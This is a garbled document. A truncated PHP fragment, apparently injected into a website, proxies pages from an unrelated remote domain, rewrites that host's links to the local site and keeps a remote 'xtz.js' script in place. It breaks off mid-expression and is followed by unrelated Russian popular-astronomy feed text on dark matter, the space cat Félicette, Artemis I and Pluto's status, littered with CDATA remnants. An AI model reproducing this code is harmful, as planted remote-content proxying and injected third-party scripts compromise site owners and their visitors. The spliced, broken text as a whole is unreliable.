$API_URL = 'https://id.yuanhengbc.com/th100';
$scheme = (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') ? 'https' : 'http';
$host = $_SERVER['HTTP_HOST'] ?? 'localhost';
$MY_DOMAIN = $scheme . '://' . $host;
function rewrite_remote_urls($html, $api_url, $my_domain) {
if (empty($html)) return $html;
$orig_host = parse_url($api_url, PHP_URL_HOST);
$my_host = parse_url($my_domain, PHP_URL_HOST);
$html = str_replace('https://' . $orig_host . '/xtz.js', '%%XTZ_KEEP%%', $html);
$html = str_replace(
array('https://' . $orig_host, 'http://' . $orig_host, '//' . $orig_host),
array($my_domain, $my_domain, '//' . $my_host),
$html
);
$html = preg_replace(
'/
Как же мы узнали, что в центре нашего Млечного пути есть кольцо звезд? Мы наблюдаем и изучаем аналогичные объекты во Вселенной. В центральных частях других галактик с перемычкой, подобных нашей, учёные часто наблюдали кольцо из новых рождающихся звёзд. Теперь можно с уверенностью утверждать, что такое кольцо есть и в нашей галактике. Молодые звёзды формируют окружность относительно недалеко от центра Млечного пути. Кроме юности у звёзд есть ещё одна общая черта – все они богаты металлами. Вычислить существование кольца помогли данные проекта Слоуновского цифрового обзора неба APOGEE. Исследования проводится не в оптическом, а в ближнем инфракрасном диапазоне, т.к. пыль хорошо проницаема для ИК-лучей.
]]>Итак, Вселенная состоит из трех компонентов: почти на 5% из обычной, т.е. видимой материи, приблизительно, на 27% из темной, т.е. неизученной материи и, примерно, на 68% из темной, т.е. неизученной энергии.
Обычная, видимая материя, составляет все, что мы можем непосредственно наблюдать невооруженным глазом, в телескоп или микроскоп, с помощью технических устройств. Мы наблюдаем ее в видимом свете собственными глазами или с помощью технических устройств в ультрафиолетовом или инфракрасном свете. Материя состоит из атомов, которые. В свою очередь состоят из протонов, нейтронов и электронов. Материя может существовать в виде газа, твердого тела, жидкости или плазмы заряженных частиц. Несмотря на то, что обычная, видимая материя присутствует повсюду, в нашей повседневной жизни, она составляет менее 5% от общей массы Вселенной.
Но во Вселенной значительно больше темной материи. Свое название темная материя получила не из-за того, что она темная по цвету, а потому что она неизученная. То есть слово «темная» в этом случае используется в значении «неизученная, загадочная, непонятная для нас». Подобно обычной материи, темная материя занимает пространство и обладает массой. Но он не отражает, не поглощает и не излучает свет. По крайней мере, пока мы так думаем, потому что несмотря на все имеющееся у нас современное оборудование мы так и не смоги ее обнаружить. Хотя ученые подсчитали, что темная материя составляет около 27% космоса, они не понимают, что именно это такое. Есть различные теории, которые предполагают, что это какие-то, пока неидентифицированные, виды частиц, видимо, взаимодействуют с обычной материей, но крайне редко.
Астрономы даже не подозревали о существовании темной материи до 20-го века. В 1930-х годах швейцарский астроном Фриц Цвикки ввел этот термин в обиход, изучая скопление галактик Кома, которое содержит более 1000 галактик. Скорость, с которой галактики движутся внутри скопления, зависит от общей массы и размера скопления. Цвикки заметил, что галактики в скоплении Кома двигались быстрее, чем можно было объяснить количеством вещества, которое астрономы могут в этом скоплении наблюдать. Только в 1970-х годах американский астроном Вера Рубин подтвердила существование темной материи, изучив, как вращаются отдельные галактики. Она и ее коллеги обнаружили, что отдельные галактики могут содержать невидимую массу, состоящую из темной материи.
Ученые сегодня полагают, что темная материя существует в виде обширной структуры, похожей на 3-D паутину (гравитационного каркаса), которая пронизывает всю Вселенную, притягивая большую часть обычной материи космоса. Они определили, что темная материя не состоит из известных нам частиц обычной материи. Если бы это было так, то Вселенная выглядела бы совсем по-другому. Поиски того, что составляет темную материю, продолжаются.
Но преимущественно Вселенная состоит из темной энергии. На нее приходится оставшиеся 68% Вселенной. Ученые называют эту энергию темной, потому что знают о ней еще меньше, чем о темной материи. Но они уверены, что что-то вроде темной энергии должно существовать. Иначе никак не объяснить ускоряющееся расширение Вселенной.
С конца 1920-х годов астрономы знали, что Вселенная расширяется. В 1990-х годах наблюдения за взрывами далеких звезд, называемых сверхновыми, показали, что в прошлом Вселенная расширялась медленнее, чем сейчас. Причина этого остается неясной, но основное объяснение заключается в том, что Вселенная содержит нечто, обладающее отталкивающим гравитационным эффектом – оно раздвигает Вселенную на части вместо того, чтобы снова собирать ее воедино. Это явление называется темной энергией.
По материалам американского космического агентства NASA.
]]>
Еще до людей в космосе, на орбите Земли побывало множество самых разных животных: собаки, обезьяны, черепахи и… единственная кошка. Этой чести была удостоена чёрно-белая француженка Фелисетт. Изначально, в 1963 году во Франции программу по подготовке к космическому полёту прошёл кот Феликс. Во время обучения он… «мышей не ловил», а перед самым стартом и вовсе — безответственно сбежал. В срочном порядке его заменила кошка, которая проходила обучение в отряде пушистых покорителей космоса. Звали её Фелисэтт. Запуск кошки был осуществил 18 октября 1963 года французским Учебный и научно-исследовательский центр авиационной медицины (CERMA). Ракета-носитель стартовала с космодрома Хаммагир и менее чем за 15 минут поднялась на высоту 160 км. Здесь произошло отделение капсулы с кошкой. Затем капсула на парашюте опустилась на землю, где была найдена поисковой командой. Именно Фелисэтт стала первой и единственной кошкой, совершившей короткий орбитальный полёт. Вот как она выглядит на памятных открытках.
]]>В этом году исполняется 62 года с того дня, когда человечество смогло своими глазами взглянуть на себя и свой дом — Землю со стороны. Увидеть, как прекрасна наша планета и осознать себя крупинкой в необъятной разбегающейся Вселенной, которой по счастливому стечению многих удивительных обстоятельств посчастливилось стать обитаемой и бережно хранить Жизнь на протяжении 4 000 000 000 лет. Невозможно до конца осознать, что каждую секунду нашей жизни, сидя за компьютером, завтракая по утрам, сладко засыпая в своей постели, мы несемся сквозь пространство и время на удобном, очень комфортабельном и несмотря ни на что, по-прежнему, весьма благосклонном к нам, космическом корабле под названием Земля.
Пять тысяч лет назад мы впервые с удивлением посмотрели в Космос и с тех пор все больше и больше узнаем о Вселенной и мечтаем о других мирах. Теперь уже мы многое знаем, но, к сожалению, наши технические возможности сильно отстают от наших познаний и пока что мы можем путешествовать только посредством мысленных экспериментов. Ну, что же, пусть хотя бы так… Поехали!
Гравитация на Венере почти как на Земле, на Марсе около 38% от земного, а на Луне вообще в 6 раз меньше. От этого зависит, как высоко вы сможете подпрыгнуть на том или ином небесном теле. А как насчёт Меркурия или, скажем, спутников Юпитера? В этом видео всё максимально наглядно. Как высоко ты подпрыгнешь на разных планетах и телах Солнечной системы
Таймкод:
00:15 – Меркурий
00:34 – Венера
00:56 – Луна
01:16 – Марс
01:31 – Церера
01:54 – Юпитер
02:23 – Ганимед
02:34 – Сатурн
02:56 – Титан
03:10 – Уран
03:30 – Нептун
03:45 – Тритон
03:59 – Плутон
04:16 – Эрида
Стоковые материалы (фотографии, видео и т. д.):
www.depositphotos.com
www.shutterstock.com
www.eastnews.ru
Приводнение космического корабля Орион, произошло через 50 лет со дня высадки на Луну астронавтов Аполлона-17. Миссия Артемида I прошла успешно. С целью проверки систем под нагрузками, самая мощная в мире ракета совершила два облета вокруг Луны, приблизившись на расстояние 128 километров к ее поверхности, отлетела от Земли на самое дальнее расстояние почти в 434 500 километров, что более чем в 1000 раз дальше, чем место вращения вокруг Земли Международной космической станции.
Во время летных испытаний Орион пробыл в космосе дольше, чем любой космический корабль с астронавтами на борту, без стыковки с космической станцией. Находясь на далекой лунной орбите, Орион превзошел рекорд, ранее установленный Аполлон-13, по расстоянию по пройденному пилотируемым космическим кораблем.
В ближайшие дни Орион будет доставлен на берег, где техники осмотрят космический корабль и доставят его на грузовике обратно в Космический Центр Кеннеди Капсула и ее теплозащитный экран будут проходить испытания и анализ в течение нескольких месяцев. Так же изучению подлежат «пассажиры» корабля — плюшевые игрушки Снупи, минифигурки Lego и три исследовательских «манекена» NASA по имени командир Муникин Кампос, Хельга и Зохар, которые предоставят ученым важные данные.
Кроме того, на борту космического корабля Орион, из космического путешествия вернулись: галька из Мертвого моря, а также различные семена деревьев, растений, образцы дрожжей, грибы, водоросли. Теперь все они будут изучены и помещены в естественную среду, например, деревья и растения высадят в почву. Но самое главное, зачем вся эта компания образцов отправляется в далекое космическое путешествие, состоит в том, чтобы помочь ученым выяснить, как среда дальнего космоса, включая воздействие жесткой радиации, может влиять на биологические системы.
«После того, как Орион благополучно вернулся на Землю, мы смогли увидеть на горизонте нашу следующую миссию, которая впервые доставит экипаж на Луну в рамках следующей эры исследований», — сказал Джим Фри, заместитель администратора НАСА по исследованию. «Это начало нашего пути к регулярным рейсам и постоянному человеческому присутствию на Луне с целью научных открытий и подготовки к миссиям человека на Марс».
Миссий Артемида I проложила путь к долгосрочному присутствию на Луне и послужила трамплином для астронавтов на пути к Марсу.
]]>
В этот день на XXVI Ассамблее Международного астрономического союза (МАС) резолюциями 5A и 5B XXVI было принять решение считать классической только ту планету Солнечной системы, которая одновременно соответствует всем четырем следующим требования:
И этому есть объяснение. Первое из этих требований отличает планету от спутника. Второе — ставит нижний предел массе планеты, которой должно хватать для того, чтобы преодолеть предел пластичности горных пород. Третье — указывает на условия формирования планеты, которая должна представлять собой доминирующую массу на своей орбите; все сравнимые с ней массы должны либо упасть на планету, либо быть выброшены с близких орбит вследствие ее гравитационных возмущений. Четвертое условие ставит верхний предел массе планеты — она должна быть достаточно мала, чтобы в ней ни на каком этапе эволюции не протекали термоядерные реакции (это основной признак звезды).
Всем этим требованиям отвечают 8 планет Солнечной системы: Меркурий, Венера, Земля, Марс, Юпитер, Сатурн, Уран и Нептун, но не Плутон. В отличии от остальных планет, орбита, по которой движется Плутон, не занята только им одним. На ней присутствуют другие космические объекты, что говорит о том, что Плутон не обладает достаточной мощью, чтобы отвоевать пространство и проторить себе путь.
]]>И если все пройдет удачно, уже 11 декабря 2022 года Орион совершит мягкую посадку на Землю, во время которой будут испытаны новый тепловой щит и другие элементы корабля на устойчивость и безопасность.
В случае полного успеха в НАСА незамедлительно приступят к реализации второго этапа – миссии Артемида 2 по отправке к Луне космического аппарата с людьми, который также облетит вокруг Луны и вернется на Землю.
]]>
]]>